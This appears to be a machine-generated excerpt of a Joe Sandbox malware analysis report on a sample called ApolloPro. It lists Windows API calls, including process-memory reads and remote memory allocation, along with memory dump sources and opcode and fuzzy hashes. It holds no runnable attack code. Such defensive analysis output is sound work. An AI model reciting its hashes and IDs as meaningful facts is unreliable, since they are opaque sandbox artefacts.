                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0068A3F7
                                                                                                • Part of subcall function 00691C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00689E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00691CB0
                                                                                                • Part of subcall function 00691BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00691C08
                                                                                                • Part of subcall function 00691BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00689E12,00000034,?,?,00001004,00000000,00000000), ref: 00691C18
                                                                                                • Part of subcall function 00691BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00689E12,00000034,?,?,00001004,00000000,00000000), ref: 00691C2E
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068A464
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068A4B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 614c4a9d1e187f41d9ca4e41fa9b61018e8a288f73f0af79c3416b67fc74d3e3
                                                                                              • Instruction ID: 8bd5c1d7a1978f1e714b3f547ab3467e43924678ba9a20bbc39011ca291c1420
                                                                                              • Opcode Fuzzy Hash: 614c4a9d1e187f41d9ca4e41fa9b61018e8a288f73f0af79c3416b67fc74d3e3
                                                                                              • Instruction Fuzzy Hash: D4414C7294121CAFDF10DFA4CD85AEEB7B9EB45300F10419AFA45B7280DA706E45CBA1
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006B7A86
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006B7A9A
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B7ABE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: 8f4680a229c596b1b3f09d700d17a7e8a02e4f5e90af6e683c37ba9f7bdda89b
                                                                                              • Instruction ID: 047d8a0dd125395047222374e10ce086983ff492117a0e0cf3e104607bf2f241
                                                                                              • Opcode Fuzzy Hash: 8f4680a229c596b1b3f09d700d17a7e8a02e4f5e90af6e683c37ba9f7bdda89b
                                                                                              • Instruction Fuzzy Hash: 0221A372654219BFDF158F54CC42FEE3B6AEF88724F110214FE156B1D0DAB1A991CB90
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006B826F
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006B827D
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006B8284
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 49916bc863b911bf5340b156cb6a609e74c66a88d0903f317e36b290759a5fae
                                                                                              • Instruction ID: 3b71979535ca10ab20a8066c26edc164fde8e550330d9747445462c51e2433a9
                                                                                              • Opcode Fuzzy Hash: 49916bc863b911bf5340b156cb6a609e74c66a88d0903f317e36b290759a5fae
                                                                                              • Instruction Fuzzy Hash: A0217AB1604209AFEB00DF58CC85DB737AEEF5A3A4B040159FA119B3A1CB70EC51CBA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006B7360
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006B7370
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006B7395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: eede3170b82b5e22007542d662d0a8ffd9f5111ce7478470978f25232a3db835
                                                                                              • Instruction ID: f410fcca0a300edaeac175c06412c50b0bf80bc284c77ea4388ebf71952b6a2f
                                                                                              • Opcode Fuzzy Hash: eede3170b82b5e22007542d662d0a8ffd9f5111ce7478470978f25232a3db835
                                                                                              • Instruction Fuzzy Hash: 9121C272614118BFEF158F55CC85FFF37ABEB89764F018124F9009B290CA71AC919BA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006B7D97
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006B7DAC
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006B7DB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 6dddeb1e686a28f835eb5cb54f89472f76b1220abd4afb67b38e3047b570ea48
                                                                                              • Instruction ID: 5339a7d37a64942492c5ea75517980e25eba0943aafa73174cde2e003d676f14
                                                                                              • Opcode Fuzzy Hash: 6dddeb1e686a28f835eb5cb54f89472f76b1220abd4afb67b38e3047b570ea48
                                                                                              • Instruction Fuzzy Hash: 9C11E7B2244208BEDF109F65CC05FE777AAEFC9B54F11411CFA41A6190D671A851DB20
                                                                                              APIs
                                                                                                • Part of subcall function 0066B544: _memset.LIBCMT ref: 0066B551
                                                                                                • Part of subcall function 00650B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0066B520,?,?,?,0063100A), ref: 00650B79
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0063100A), ref: 0066B524
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063100A), ref: 0066B533
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0066B52E
                                                                                              • =m, xrefs: 0066B514
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=m
                                                                                              • API String ID: 3158253471-3350302448
                                                                                              • Opcode ID: 4c64d58cca779a7255dddd3762c9aa799c475fa202f8485f3b5a631aaf1e6f01
                                                                                              • Instruction ID: 2959d329cf3a90f282666adef99d53747b6d1ccebffb6b321a722c4e6a2125ca
                                                                                              • Opcode Fuzzy Hash: 4c64d58cca779a7255dddd3762c9aa799c475fa202f8485f3b5a631aaf1e6f01
                                                                                              • Instruction Fuzzy Hash: 3AE09270200351CFE3609F35E808B92BBE2AF04304F10991EE886C2341EBB5D648CF92
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0067027A,?), ref: 006AC6E7
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006AC6F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                              • API String ID: 2574300362-1816364905
                                                                                              • Opcode ID: 10b97a8e034d7581fa6bed60cb2b222a764fb0f1fde61700a9abcad8a4b0ce21
                                                                                              • Instruction ID: c998644e990c8075f6616c61600ce5ad3791bdede484ae1442b6a4cad7b14314
                                                                                              • Opcode Fuzzy Hash: 10b97a8e034d7581fa6bed60cb2b222a764fb0f1fde61700a9abcad8a4b0ce21
                                                                                              • Instruction Fuzzy Hash: 2CE08C38100302CFE7206B25C848FA6B6D6EB05324B50A429E885C2710D770CC808F10
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00644B44,?,006449D4,?,?,006427AF,?,00000001), ref: 00644B85
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00644B97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-3689287502
                                                                                              • Opcode ID: 0685aeefa8917c96df70c60f49ff687da133f4f9120fdb980a1b80af4afea36e
                                                                                              • Instruction ID: c7c64b5a4f0675dcec1ff6175f695e401ad78198b063ba33978903a359ee0e48
                                                                                              • Opcode Fuzzy Hash: 0685aeefa8917c96df70c60f49ff687da133f4f9120fdb980a1b80af4afea36e
                                                                                              • Instruction Fuzzy Hash: 9BD01770510B12CFE7209F71EC19B56B6E6EF04351F16982ED486E2A50EA70E880CA14
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00644AF7,?), ref: 00644BB8
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00644BCA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-1355242751
                                                                                              • Opcode ID: 99190a42dde9245b8c50207b45312ffa8b7889d4890bca14ba05dc2e19496957
                                                                                              • Instruction ID: fd4b66ad31921b50cbe921a858b201792fbc8e62b7ea5a301cf380d465d5a1bf
                                                                                              • Opcode Fuzzy Hash: 99190a42dde9245b8c50207b45312ffa8b7889d4890bca14ba05dc2e19496957
                                                                                              • Instruction Fuzzy Hash: 47D017B0510712CFE7209F71EC09B56B6E7EF04351F26AC6ED486D2A54EE74D880CA10
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,006B1696), ref: 006B1455
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006B1467
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: 4ca51243e51e29b2c733e4b930d0b40abc19b7e6ae9c88ebff0e7515fea7dc43
                                                                                              • Instruction ID: a197c1306d4b987df65fea138f034bb642f9bd4f5606561c61da20ab91426c8e
                                                                                              • Opcode Fuzzy Hash: 4ca51243e51e29b2c733e4b930d0b40abc19b7e6ae9c88ebff0e7515fea7dc43
                                                                                              • Instruction Fuzzy Hash: 1DD01270511712DFE7205F75C819696B6D6AF06395F15C82A94D5D6650E670D4C0C710
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00645E3D), ref: 006455FE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00645610
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2574300362-192647395
                                                                                              • Opcode ID: 146e82fea98a2c1aea8c2bb3c5747d20b333c4513170992c49bf7d7919d1cdd7
                                                                                              • Instruction ID: 617fb48d31bf6cfc7af13aa505b584de643463770dbc702bd38be116a5e3425a
                                                                                              • Opcode Fuzzy Hash: 146e82fea98a2c1aea8c2bb3c5747d20b333c4513170992c49bf7d7919d1cdd7
                                                                                              • Instruction Fuzzy Hash: 26D05E74920B12CFF7209F71CC08B66BAE6EF04355F16E82ED4C6D26A2E770C880CA50
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006A93DE,?,006C0980), ref: 006A97D8
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006A97EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 2574300362-199464113
                                                                                              • Opcode ID: 9c37f3c775d5cc1aa574a13737926ede794a12622c4ca4e8776884c3d43f023c
                                                                                              • Instruction ID: 3a1c2721c54f2d1d62b05568ec144fd6e3f999987443b90563577a7ac5f8c588
                                                                                              • Opcode Fuzzy Hash: 9c37f3c775d5cc1aa574a13737926ede794a12622c4ca4e8776884c3d43f023c
                                                                                              • Instruction Fuzzy Hash: 9CD01270510713CFE7205F71D888A56B6D6AF05795F25A82DD485D2650DF70C880CA21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29be2bb22d02d7fe2c1e7dea9da9d085459d662dd6b71737e5a0d51c192c6c2b
                                                                                              • Instruction ID: 3eb0220a10d3a4cc3bd36c621ea4d7a385df7034c845275bb495701b8cd8bc1d
                                                                                              • Opcode Fuzzy Hash: 29be2bb22d02d7fe2c1e7dea9da9d085459d662dd6b71737e5a0d51c192c6c2b
                                                                                              • Instruction Fuzzy Hash: 3CC18F74A00216EFCB14DF94C884EAEB7B6FF48714B208698E905EB351DB31ED81CB90
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 006AE7A7
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 006AE7EA
                                                                                                • Part of subcall function 006ADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006ADEAE
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006AE9EA
                                                                                              • _memmove.LIBCMT ref: 006AE9FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3659485706-0
                                                                                              • Opcode ID: 729bdb26b7aec364a4e0862785e84226a576ff59a1019a8a8c1e549c8e68e367
                                                                                              • Instruction ID: 3c2e223eff614d0873730969e09a7114e040987b0dfce55642264ed1b6362134
                                                                                              • Opcode Fuzzy Hash: 729bdb26b7aec364a4e0862785e84226a576ff59a1019a8a8c1e549c8e68e367
                                                                                              • Instruction Fuzzy Hash: C6C11671A043019FC754EF28C48096ABBE6FF8A714F14896EE8999B351D731ED46CF82
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 006A87AD
                                                                                              • CoUninitialize.OLE32 ref: 006A87B8
                                                                                                • Part of subcall function 006BDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,006A8A0E,?,00000000), ref: 006BDF71
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A87C3
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A8A94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 780911581-0
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688308
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688320
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,006C0988,000000FF,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688345
                                                                                              • _memcmp.LIBCMT ref: 00688366
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 006AF526
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 006AF534
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 006AF5F4
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006AF603
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2576544623-0
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006B9E88
                                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 006B9EBB
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006B9F28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              APIs
